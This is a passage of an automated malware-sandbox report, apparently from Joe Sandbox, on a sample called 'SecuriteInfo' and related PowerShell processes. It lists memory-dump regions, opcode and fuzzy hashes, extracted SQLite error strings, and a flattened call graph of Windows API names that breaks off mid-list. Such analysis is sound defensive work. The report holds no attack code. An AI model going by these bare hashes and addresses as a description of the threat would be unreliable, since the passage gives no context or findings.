                                                            • Associated: 00000002.00000002.1773423131.00007FF8E7530000.00000080.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773459694.00007FF8E7532000.00000004.00000001.01000000.0000000A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff8e7510000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: 00007
                                                            • String ID: Base Connection.__init__ not called.$Base Cursor.__init__ not called.$Cannot operate on a closed cursor.$Cannot operate on a closed database.$Recursive use of cursors not allowed.$SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu.
                                                            • API String ID: 3568877910-2922342969
                                                            • Opcode ID: b2c2694dadf35b8f66a47485a1d86f397de167e51834a5e6fdf4c519bbf6613e
                                                            • Instruction ID: 1d8eeb3bc23b3276f72b4791b3b6b55e21bb410bdd07c03c94d42a611eded37c
                                                            • Opcode Fuzzy Hash: b2c2694dadf35b8f66a47485a1d86f397de167e51834a5e6fdf4c519bbf6613e
                                                            • Instruction Fuzzy Hash: E0910632A09E4281EB548FA9DC5437C67A0FB85BD7F240835CA2E476A4DF3DE985C342
                                                            Strings
                                                            • Cannot operate on a closed database., xrefs: 00007FF8E7519173
                                                            • Base Connection.__init__ not called., xrefs: 00007FF8E751910C
                                                            • SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu., xrefs: 00007FF8E75191B1
                                                            • factory must return a cursor, not %.100s, xrefs: 00007FF8E75190C3
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1773292284.00007FF8E7511000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8E7510000, based on PE: true
                                                            • Associated: 00000002.00000002.1773243251.00007FF8E7510000.00000002.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E7528000.00000040.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E752E000.00000040.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773423131.00007FF8E7530000.00000080.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773459694.00007FF8E7532000.00000004.00000001.01000000.0000000A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff8e7510000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Base Connection.__init__ not called.$Cannot operate on a closed database.$SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu.$factory must return a cursor, not %.100s
                                                            • API String ID: 0-2953218143
                                                            • Opcode ID: 25cc7f2b8a872ceb47122164e428b0963f60e66b2714bfe679bedf1994e22dde
                                                            • Instruction ID: 3399b5a6eabd1dbb630675074220f773c9d165406869e547b934932b76ca8552
                                                            • Opcode Fuzzy Hash: 25cc7f2b8a872ceb47122164e428b0963f60e66b2714bfe679bedf1994e22dde
                                                            • Instruction Fuzzy Hash: 4F713436A09E83C6EA549FA6DC8423C63A0FB45FD6B244431CE2E03794DF3DE8858342
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1773557891.00007FF8E7541000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF8E7540000, based on PE: true
                                                            • Associated: 00000002.00000002.1773494525.00007FF8E7540000.00000002.00000001.01000000.00000008.sdmp
                                                            • Associated: 00000002.00000002.1773557891.00007FF8E755C000.00000040.00000001.01000000.00000008.sdmp
                                                            • Associated: 00000002.00000002.1773557891.00007FF8E7564000.00000040.00000001.01000000.00000008.sdmp
                                                            • Associated: 00000002.00000002.1773557891.00007FF8E7569000.00000040.00000001.01000000.00000008.sdmp
                                                            • Associated: 00000002.00000002.1773687913.00007FF8E756A000.00000080.00000001.01000000.00000008.sdmp
                                                            • Associated: 00000002.00000002.1773719902.00007FF8E756C000.00000004.00000001.01000000.00000008.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff8e7540000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: 00007E7637
                                                            • String ID: Invalid filter ID: %llu$dict_size$dist$start_offset
                                                            • API String ID: 4629914-3368833446
                                                            • Opcode ID: 70732c878d185871e83d032ed88e66c35bf329b642db62c29c46d98ad4e53224
                                                            • Instruction ID: 13cdc2c312b28bb2979b4f28c0489e14533a165d0ce36e9a95eb74fe88f0c488
                                                            • Opcode Fuzzy Hash: 70732c878d185871e83d032ed88e66c35bf329b642db62c29c46d98ad4e53224
                                                            • Instruction Fuzzy Hash: 6E41F131A08EC381EA648B99ED4427C23A1BF057D4B185631CA3E476E0EF3DF4A59703
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1773292284.00007FF8E7511000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8E7510000, based on PE: true
                                                            • Associated: 00000002.00000002.1773243251.00007FF8E7510000.00000002.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E7528000.00000040.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E752E000.00000040.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773423131.00007FF8E7530000.00000080.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773459694.00007FF8E7532000.00000004.00000001.01000000.0000000A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff8e7510000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: 00007
                                                            • String ID: COMMIT$query string is too large
                                                            • API String ID: 3568877910-2709575789
                                                            • Opcode ID: 35e193ac2c27ee0a438aa9099ef1b5c24edca56c53d06f0d483d03152d3b0d49
                                                            • Instruction ID: d8a0c37c0e5947927b54a5dbff25c4b637d0b0b30cc6c2c495d546349a2620a0
                                                            • Opcode Fuzzy Hash: 35e193ac2c27ee0a438aa9099ef1b5c24edca56c53d06f0d483d03152d3b0d49
                                                            • Instruction Fuzzy Hash: 10418262A18E8386EB009B6AEC4436D63A0FB88FD6F250935DE6D47764DF3CD446C701
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1568092867.00007FF886B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886B60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7ff886b60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d44be64a142c6ea01ed3a135aa2af10db9fe74c9987c6fbde355cd1f4667f755
                                                            • Instruction ID: f6d2175e42e7edf3819c0a9a9b62a13caa299b6af7e4edc754d31c512fdafcfd
                                                            • Opcode Fuzzy Hash: d44be64a142c6ea01ed3a135aa2af10db9fe74c9987c6fbde355cd1f4667f755
                                                            • Instruction Fuzzy Hash: 9B524822E0DB894FE396976C58656B07BE1FF96668B0911FBC04DC71D3DD19AC0AC382
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1565732494.00007FF88697D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88697D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7ff88697d000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: xrw
                                                            • API String ID: 0-1467674462
                                                            • Opcode ID: 2ee2c04fceb4678cdf62b5a927adab4f6d20401011597e3d4edd18b41d6cf06a
                                                            • Instruction ID: f6da1b7dcc59fee5b09cdfa05bc5b15dec080d04595c3bea7f9018fb903c209a
                                                            • Opcode Fuzzy Hash: 2ee2c04fceb4678cdf62b5a927adab4f6d20401011597e3d4edd18b41d6cf06a
                                                            • Instruction Fuzzy Hash: 4041E27180DBC44FE7569B29AC499523FF0FF56260B1505EFD088CB1A3D625AC4AC7A2
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1567032813.00007FF886A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7ff886a90000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 43a25550f4790b8daafb421de24780d817db49343e96db25b3c947fb2f93c63a
                                                            • Instruction ID: c42b64c3cee67936ac7dc550025de145701cabea20ff63808354eba81683bf4c
                                                            • Opcode Fuzzy Hash: 43a25550f4790b8daafb421de24780d817db49343e96db25b3c947fb2f93c63a
                                                            • Instruction Fuzzy Hash: 821146A580E7C88FD7438B345C651907FB0EE67240B1A00EBD599CF1B3E9285D09C7A2
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1568092867.00007FF886B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886B60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7ff886b60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f081930938a2a72a0fddc5be5ab5a600e29b92c5afdda89991e7bbebd893849a
                                                            • Instruction ID: c689271cbf4bfb001187a7c4921e79efc8c0d8cfc33b34a31d0576aadf16c8e7
                                                            • Opcode Fuzzy Hash: f081930938a2a72a0fddc5be5ab5a600e29b92c5afdda89991e7bbebd893849a
                                                            • Instruction Fuzzy Hash: 07710561D0DBCA4FE3A69A2C58555717BE1FF96798B0912FBC04CCB293DD19AC0AC342
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1567032813.00007FF886A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7ff886a90000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e33df761e2510ceb3a5566eaeeaebbf5aa400357123dcf533b4a7317277506c2
                                                            • Instruction ID: 1c8771e6498c310f318bb4f40ca1568c6e16646532e2b16b688392fd67176393
                                                            • Opcode Fuzzy Hash: e33df761e2510ceb3a5566eaeeaebbf5aa400357123dcf533b4a7317277506c2
                                                            • Instruction Fuzzy Hash: 3741FB3191CB888FDB1C9B5CAC066F97BE0FB59711F04416FE459D3252DA60AC55CBC2
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1567032813.00007FF886A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7ff886a90000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 00d59b938f6b5406dd42ed6de130c1e623fecd0b0748a2793e9ebd6495de6ac5
                                                            • Instruction ID: d8afd131992ffce4037c391cf1d61fc22f3a3fd082ada76e0aafc42040472983
                                                            • Opcode Fuzzy Hash: 00d59b938f6b5406dd42ed6de130c1e623fecd0b0748a2793e9ebd6495de6ac5
                                                            • Instruction Fuzzy Hash: 1431267190CB8C8FDB59DB68984A6E97FE0EBA6320F04416FD059C7193DA645C06CB92
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1567032813.00007FF886A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7ff886a90000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 70f976536713f32d1e5d51852589fed7ba758c9fe94e07d1a5afcb6aec078fd9
                                                            • Instruction ID: 495de667de6a3417a6be0caae08b088a90dcd593b681e59e81faebfff9eccd02
                                                            • Opcode Fuzzy Hash: 70f976536713f32d1e5d51852589fed7ba758c9fe94e07d1a5afcb6aec078fd9
                                                            • Instruction Fuzzy Hash: 9721F53190CA8C8FEB58DB58984A7F97BE0EB95320F04416FD04DC7152D6249816CB82
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1568092867.00007FF886B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886B60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7ff886b60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3d0fab8fd86e3885c3eb12336b6016ffb9c360f5a4c31df689d476e39ee311c6
                                                            • Instruction ID: 786ed2bf715cd537910af6e890515aa9658ef880f9c55b8ed6b6b0e16e96f545
                                                            • Opcode Fuzzy Hash: 3d0fab8fd86e3885c3eb12336b6016ffb9c360f5a4c31df689d476e39ee311c6
                                                            • Instruction Fuzzy Hash: 2C112532E0D6898FE755DB9890906B87BE1FF49358F1841BEC04ED7183EA28AC05C352
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1567032813.00007FF886A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7ff886a90000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 416d78af615282d572b3a414326c95b602a4a0825e38525b723d7405b764b34a
                                                            • Instruction ID: 15a7cca56222728b8e08f6c3a04cae867539d58593e020daa03eaad3825491ac
                                                            • Opcode Fuzzy Hash: 416d78af615282d572b3a414326c95b602a4a0825e38525b723d7405b764b34a
                                                            • Instruction Fuzzy Hash: 8901677115CB0C8FD744EF0CE451AA6B7E0FB95364F10056DE58AC3651DB36E882CB46
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1568092867.00007FF886B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886B60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7ff886b60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5aa9a59cf23d9b72d11795ff97779c3fe517e954e06c9db0c98be7917355dfd0
                                                            • Instruction ID: 45e03d5ef35a9c7ab944477ac90b3529c22abaf0ef818d24fdaba2016320eae5
                                                            • Opcode Fuzzy Hash: 5aa9a59cf23d9b72d11795ff97779c3fe517e954e06c9db0c98be7917355dfd0
                                                            • Instruction Fuzzy Hash: 36F0BE32A0C9458FE668EA4CE4414E873E0FF49334B1540BAE10DC71A3CB29FC45C741
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1568092867.00007FF886B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886B60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7ff886b60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 064a8afc7f1db6f7aef213b37023d68a1e6cb4f55a6f8d3a1e697cba34a8865a
                                                            • Instruction ID: ccc46ea1742961e368c40fbcdef73ff0725220ab0f00be94d42dae7f475f885d
                                                            • Opcode Fuzzy Hash: 064a8afc7f1db6f7aef213b37023d68a1e6cb4f55a6f8d3a1e697cba34a8865a
                                                            • Instruction Fuzzy Hash: ECF05832A0D9448FEB98EA5CE4419E877E0FF06364B1540F6E109CB1A3DB2AAC48C781
                                                            Memory Dump Source
                                                            • Source File: 0000002D.00000002.1623539785.00007FF886AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886AB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_45_2_7ff886ab0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 27ed7bebd3746532e288c3d94708ac522ff752c67de9253ed378b4d84249780f
                                                            • Instruction ID: 5c3c7afe714a0839a22c617f3eba7e1599d03a61477a083aff16df57a1f41a9e
                                                            • Opcode Fuzzy Hash: 27ed7bebd3746532e288c3d94708ac522ff752c67de9253ed378b4d84249780f
                                                            • Instruction Fuzzy Hash: 9F71C130E09A598FDB55EBACD8966ECBBF1FF4A710F1441AED04DD7292CA256C02CB41
                                                            Memory Dump Source
                                                            • Source File: 0000002D.00000002.1624259228.00007FF886B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886B80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_45_2_7ff886b80000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 81dd04935e34dd35e11f850fa6467e5550741c328f38e777a9d331f5a3d05204
                                                            • Instruction ID: defc7a30f54d341730fa9256d007c2025cb308bf25dfb048479fe6effed4ae0e
                                                            • Opcode Fuzzy Hash: 81dd04935e34dd35e11f850fa6467e5550741c328f38e777a9d331f5a3d05204
                                                            • Instruction Fuzzy Hash: 48410822B2DE0B4FE7A99A5C64516B973D2FF852A4F08017BC00EC7187EE18AC16C281
                                                            Memory Dump Source
                                                            • Source File: 0000002D.00000002.1624259228.00007FF886B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886B80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_45_2_7ff886b80000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 07d02053fea609acf89261f7f159d0cb975c311f82c55e93bd53798216769de2
                                                            • Instruction ID: d1882cc202b73303c810692b6c258ae20bffefb27fd7c4f0b84ab1a4d0d36e22
                                                            • Opcode Fuzzy Hash: 07d02053fea609acf89261f7f159d0cb975c311f82c55e93bd53798216769de2
                                                            • Instruction Fuzzy Hash: 5841B631E2E95A4FEBB99A6C54516F973D2FF447D4B5801BAC00EC7286FE18AC11C382
                                                            Memory Dump Source
                                                            • Source File: 0000002D.00000002.1623539785.00007FF886AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886AB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_45_2_7ff886ab0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a73a21c3248a198af1e89a2b13eb8794bbde26503cfb4fc4cfb7fcdcadaf0afc
                                                            • Instruction ID: dd9f7eb0577aa014d3bba51f393b604e51db529caeb4dd50848408c206dbb056
                                                            • Opcode Fuzzy Hash: a73a21c3248a198af1e89a2b13eb8794bbde26503cfb4fc4cfb7fcdcadaf0afc
                                                            • Instruction Fuzzy Hash: 9701677115CB0C4FD744EF0CE451AA5B7E0FB95364F10056DE58AC3651DB36E881CB46
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000002D.00000002.1623539785.00007FF886AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886AB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_45_2_7ff886ab0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: dZ$@z<$PM.$^
                                                            • API String ID: 0-922983480
                                                            • Opcode ID: 1e5f68f7517273994ffd7aa13481cbf54e3c2e9914abf56f4ca37fff9174ce63
                                                            • Instruction ID: 584bd438b1a6393c410d150073e55a1a2bb1eb0b77f90eaa14a653284c60349a
                                                            • Opcode Fuzzy Hash: 1e5f68f7517273994ffd7aa13481cbf54e3c2e9914abf56f4ca37fff9174ce63
                                                            • Instruction Fuzzy Hash: F261D752D0E9D15BF2664568385A2B9AFA0FF527A4F9C40FBC18C6B0DFEC45DC198381

                                                            Execution Graph

                                                            Execution Coverage:7.9%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:0.5%
                                                            Total number of Nodes:1244
                                                            Total number of Limit Nodes:37
39309->39318 39319 7ff71d2c17c8 216 API calls 2 library calls 39310->39319 39312 7ff71d2c166a 39312->39300 39313 7ff71d2e6fe8 216 API calls 39313->39318 39314 7ff71d2e6e90 216 API calls 39314->39318 39315 7ff71d2e6d38 216 API calls 39315->39318 39316 7ff71d2c1080 48 API calls 39316->39318 39318->39312 39318->39313 39318->39314 39318->39315 39318->39316 39320 7ff71d2c17c8 216 API calls 2 library calls 39318->39320 39319->39318 39320->39318 39321 7ff71d2b1884 39453 7ff71d2e34e4 39321->39453 39324 7ff71d2b1926 39326 7ff71d2b195b 39324->39326 39517 7ff71d2e3f98 63 API calls 2 library calls 39324->39517 39325 7ff71d2e34e4 CompareStringW 39327 7ff71d2b18a6 39325->39327 39334 7ff71d2b1970 39326->39334 39518 7ff71d2d2ed8 100 API calls 3 library calls 39326->39518 39328 7ff71d2e34e4 CompareStringW 39327->39328 39333 7ff71d2b18b9 39327->39333 39328->39333 39332 7ff71d2b1915 39516 7ff71d2cca40 61 API calls _CxxThrowException 39332->39516 39333->39324 39515 7ff71d2b1168 8 API calls 2 library calls 39333->39515 39336 7ff71d2b19b8 39334->39336 39519 7ff71d2f49f4 48 API calls 39334->39519 39457 7ff71d2b5450 39336->39457 39338 7ff71d2b19b0 39520 7ff71d2c8444 54 API calls fflush 39338->39520 39344 7ff71d2b72c4 76 API calls 39351 7ff71d2b1a12 39344->39351 39345 7ff71d2b1ae6 39491 7ff71d2b7514 39345->39491 39346 7ff71d2b1b04 39495 7ff71d2c6c94 39346->39495 39349 7ff71d2b1af2 39350 7ff71d2b7514 72 API calls 39349->39350 39352 7ff71d2b1aff 39350->39352 39351->39345 39351->39346 39353 7ff71d30a610 _handle_error 8 API calls 39352->39353 39354 7ff71d2b2f97 39353->39354 39355 7ff71d2b1b13 39511 7ff71d2b7148 39355->39511 39357 7ff71d2b1c71 39358 7ff71d2b1ca7 39357->39358 39359 7ff71d2b63e8 8 API calls 39357->39359 39360 7ff71d2b1cd5 39358->39360 39361 7ff71d2b1ce4 39358->39361 39362 7ff71d2b1c91 39359->39362 39363 7ff71d30a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39360->39363 39364 7ff71d30a444 new RtlPcToFileHeader RaiseException 
EnterCriticalSection LeaveCriticalSection 39361->39364 39365 7ff71d2b49b8 99 API calls 39362->39365 39369 7ff71d2b1cee 39363->39369 39364->39369 39366 7ff71d2b1c9d 39365->39366 39367 7ff71d2b63e8 8 API calls 39366->39367 39367->39358 39368 7ff71d2b1d50 39371 7ff71d30a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39368->39371 39369->39368 39370 7ff71d2fde30 72 API calls 39369->39370 39370->39368 39372 7ff71d2b1d62 39371->39372 39373 7ff71d2fdbd0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39372->39373 39374 7ff71d2b1d7b 39372->39374 39373->39374 39375 7ff71d302bcc 66 API calls 39374->39375 39376 7ff71d2b1dba 39375->39376 39449 7ff71d2dae10 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39376->39449 39377 7ff71d2b1e1c 39379 7ff71d2b10c0 8 API calls 39377->39379 39381 7ff71d2b1e5d 39377->39381 39378 7ff71d2b1dde std::bad_alloc::bad_alloc 39378->39377 39380 7ff71d30ba34 _CxxThrowException RtlPcToFileHeader RaiseException 39378->39380 39379->39381 39380->39377 39382 7ff71d2ba410 159 API calls 39381->39382 39440 7ff71d2b1ef4 39381->39440 39382->39440 39383 7ff71d2b2ccc 39384 7ff71d2b2d0c 39383->39384 39448 7ff71d2d8c80 72 API calls 39383->39448 39385 7ff71d2fde30 72 API calls 39384->39385 39392 7ff71d2b2d21 39384->39392 39385->39392 39386 7ff71d2d6688 48 API calls 39386->39440 39387 7ff71d2b2d86 39390 7ff71d2f49f4 48 API calls 39387->39390 39427 7ff71d2b2dd0 39387->39427 39388 7ff71d2b5e70 169 API calls 39417 7ff71d2b2005 39388->39417 39389 7ff71d2ba504 208 API calls 39389->39427 39395 7ff71d2b2d9e 39390->39395 39391 7ff71d2b80e4 192 API calls 39391->39427 39392->39387 39394 7ff71d2f49f4 48 API calls 39392->39394 39393 7ff71d2b5928 237 API calls 39393->39417 39396 7ff71d2b2d6c 39394->39396 39397 7ff71d2c8444 54 API calls 39395->39397 39399 7ff71d2f49f4 48 API calls 39396->39399 39400 7ff71d2b2da6 39397->39400 39398 7ff71d2d7c7c 127 API calls 39398->39427 39403 7ff71d2b2d79 
39399->39403 39408 7ff71d2d1c24 12 API calls 39400->39408 39401 7ff71d2b1168 8 API calls 39401->39427 39402 7ff71d2bb540 147 API calls 39402->39440 39406 7ff71d2c8444 54 API calls 39403->39406 39404 7ff71d2be6c8 157 API calls 39404->39440 39405 7ff71d2ce21c 63 API calls 39405->39417 39406->39387 39407 7ff71d2ba410 159 API calls 39407->39440 39408->39427 39409 7ff71d2d65b4 48 API calls 39409->39440 39410 7ff71d2fae50 71 API calls 39414 7ff71d2b2e39 39410->39414 39411 7ff71d2d4554 16 API calls 39411->39440 39412 7ff71d2d1998 138 API calls 39412->39440 39413 7ff71d2b33b4 64 API calls 39413->39427 39414->39410 39416 7ff71d2cca40 61 API calls 39414->39416 39414->39427 39415 7ff71d2b5db4 46 API calls 39415->39440 39416->39427 39417->39388 39417->39393 39417->39405 39420 7ff71d2bb540 147 API calls 39417->39420 39417->39440 39443 7ff71d2fb6d0 73 API calls 39417->39443 39445 7ff71d2f49f4 48 API calls 39417->39445 39447 7ff71d2c8444 54 API calls 39417->39447 39418 7ff71d2b6188 231 API calls 39418->39427 39419 7ff71d2b3f74 138 API calls 39419->39427 39420->39417 39421 7ff71d2ccbd0 75 API calls 39421->39440 39422 7ff71d2d7c7c 127 API calls 39422->39440 39423 7ff71d2d1930 11 API calls 39423->39440 39424 7ff71d2eba9c 195 API calls 39424->39427 39425 7ff71d2f49f4 48 API calls 39425->39427 39426 7ff71d2b5004 49 API calls 39426->39440 39427->39389 39427->39391 39427->39398 39427->39401 39427->39413 39427->39414 39427->39418 39427->39419 39427->39424 39427->39425 39429 7ff71d2c8444 54 API calls 39427->39429 39428 7ff71d2d1e80 15 API calls 39428->39440 39429->39427 39430 7ff71d2ba4d0 12 API calls 39430->39440 39431 7ff71d2d18ac 15 API calls 39431->39440 39432 7ff71d2b1168 8 API calls 39432->39440 39433 7ff71d2b571c 12 API calls 39433->39440 39434 7ff71d2fd48c 58 API calls 39434->39440 39435 7ff71d2b5e70 169 API calls 39435->39440 39436 7ff71d2fc0a8 10 API calls 39436->39440 39437 7ff71d2c9be0 14 API calls 39437->39440 39438 7ff71d2d6378 RtlPcToFileHeader RaiseException 
EnterCriticalSection LeaveCriticalSection 39438->39440 39439 7ff71d2e97f0 GetStdHandle ReadFile GetLastError GetLastError GetFileType 39439->39440 39440->39383 39440->39386 39440->39402 39440->39404 39440->39407 39440->39409 39440->39411 39440->39412 39440->39415 39440->39417 39440->39421 39440->39422 39440->39423 39440->39426 39440->39428 39440->39430 39440->39431 39440->39432 39440->39433 39440->39434 39440->39435 39440->39436 39440->39437 39440->39438 39440->39439 39441 7ff71d2d5c0c 237 API calls 39440->39441 39442 7ff71d2d5d40 237 API calls 39440->39442 39444 7ff71d2b6114 216 API calls 39440->39444 39446 7ff71d2d5708 237 API calls 39440->39446 39450 7ff71d2da250 237 API calls 39440->39450 39451 7ff71d2c0d60 237 API calls 39440->39451 39452 7ff71d2daae0 237 API calls 39440->39452 39441->39440 39442->39440 39443->39417 39444->39440 39445->39417 39446->39440 39447->39417 39448->39384 39449->39378 39450->39440 39451->39417 39452->39417 39454 7ff71d2e34f6 39453->39454 39455 7ff71d2b1893 39454->39455 39521 7ff71d2fdac0 CompareStringW 39454->39521 39455->39325 39455->39333 39458 7ff71d2b546f setbuf 39457->39458 39459 7ff71d2b554a __scrt_fastfail 39458->39459 39475 7ff71d2b5588 __scrt_fastfail 39458->39475 39462 7ff71d2fc0a8 10 API calls 39459->39462 39461 7ff71d2b5583 39551 7ff71d2b6eb8 39461->39551 39464 7ff71d2b5576 39462->39464 39465 7ff71d2b681c 54 API calls 39464->39465 39465->39461 39467 7ff71d2b56e9 39558 7ff71d2f6f68 39467->39558 39469 7ff71d2b56f6 39470 7ff71d30a610 _handle_error 8 API calls 39469->39470 39471 7ff71d2b19df 39470->39471 39477 7ff71d2b72c4 39471->39477 39475->39461 39522 7ff71d2b3210 39475->39522 39528 7ff71d2c7088 39475->39528 39532 7ff71d2b681c 39475->39532 39543 7ff71d2f7a24 39475->39543 39562 7ff71d2b571c 39475->39562 39570 7ff71d2c4380 14 API calls 39475->39570 39478 7ff71d2b72eb 39477->39478 39682 7ff71d2c88dc 39478->39682 39480 7ff71d2b7302 39686 7ff71d2e915c 39480->39686 39482 7ff71d2b730f 39698 7ff71d2e7044 39482->39698 39485 
